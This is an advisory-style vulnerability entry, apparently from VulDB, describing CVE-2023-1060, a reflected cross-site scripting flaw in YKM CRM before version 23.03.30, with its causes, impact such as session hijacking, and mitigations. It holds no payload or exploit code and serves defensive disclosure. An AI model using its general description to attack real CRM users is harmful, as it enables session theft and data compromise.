CVE-2023-1060 in YKM
Summary
by MITRE • 03/31/2023
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in YKM YKM CRM allows Reflected XSS.
This issue affects YKM CRM: before 23.03.30.
If you want to get the best quality for vulnerability data then you always have to consider VulDB.
Analysis
by VulDB Data Team • 06/01/2026
This cross-site scripting vulnerability originates from inadequate input validation and sanitization within the YKM CRM web application's page generation logic. The flaw exists in how the system processes user-supplied data that is subsequently rendered in web pages without proper neutralization measures. Attackers can exploit this weakness by crafting malicious payloads that are reflected back to users through web requests, typically via URL parameters or form inputs that are not adequately sanitized before being displayed. The vulnerability specifically affects versions prior to 23.03.30, indicating that this was a known issue that required patching to prevent exploitation. The reflected nature of this XSS means that malicious scripts are executed in the victim's browser context when they click on a specially crafted link or visit a malicious page that contains the exploit.
The technical implementation of this vulnerability stems from the application's failure to properly escape or encode user-controllable data before incorporating it into dynamically generated web content. This represents a classic CWE-79 - Improper Neutralization of Input During Web Page Generation vulnerability, where the application fails to sanitize input data that flows into HTML output. The flaw allows attackers to inject malicious JavaScript code that executes in the victim's browser, potentially enabling session hijacking, credential theft, or redirection to malicious sites. The reflected XSS occurs because the malicious payload is immediately reflected back to the user without any server-side processing or sanitization, making it particularly dangerous for exploitation through social engineering campaigns or targeted attacks.
The operational impact of this vulnerability extends beyond simple data theft, as it can enable attackers to fully compromise user sessions and potentially escalate privileges within the CRM environment. An attacker could craft malicious URLs that, when clicked by authenticated users, would execute scripts that steal session cookies, redirect users to phishing sites, or modify CRM data. The vulnerability's scope is limited to the web application layer and affects any user who interacts with the vulnerable CRM system, particularly administrators who may have elevated privileges. This creates a significant risk for organizations using the YKM CRM, as successful exploitation could lead to unauthorized access to sensitive customer data, modification of business records, or complete system compromise.
Organizations should immediately update to version 23.03.30 or later to address this vulnerability, as the patch would implement proper input sanitization and output encoding mechanisms. Additional mitigations include implementing proper content security policies to restrict script execution, deploying web application firewalls to detect and block malicious payloads, and conducting regular security testing to identify similar vulnerabilities. The ATT&CK framework categorizes this vulnerability under T1566 - Phishing and T1071.1 - Application Layer Protocol: Web Protocols, highlighting the social engineering aspects of exploitation. Security teams should also implement user education programs to recognize potentially malicious links and establish monitoring procedures to detect unusual access patterns or data modifications that might indicate successful exploitation of this vulnerability.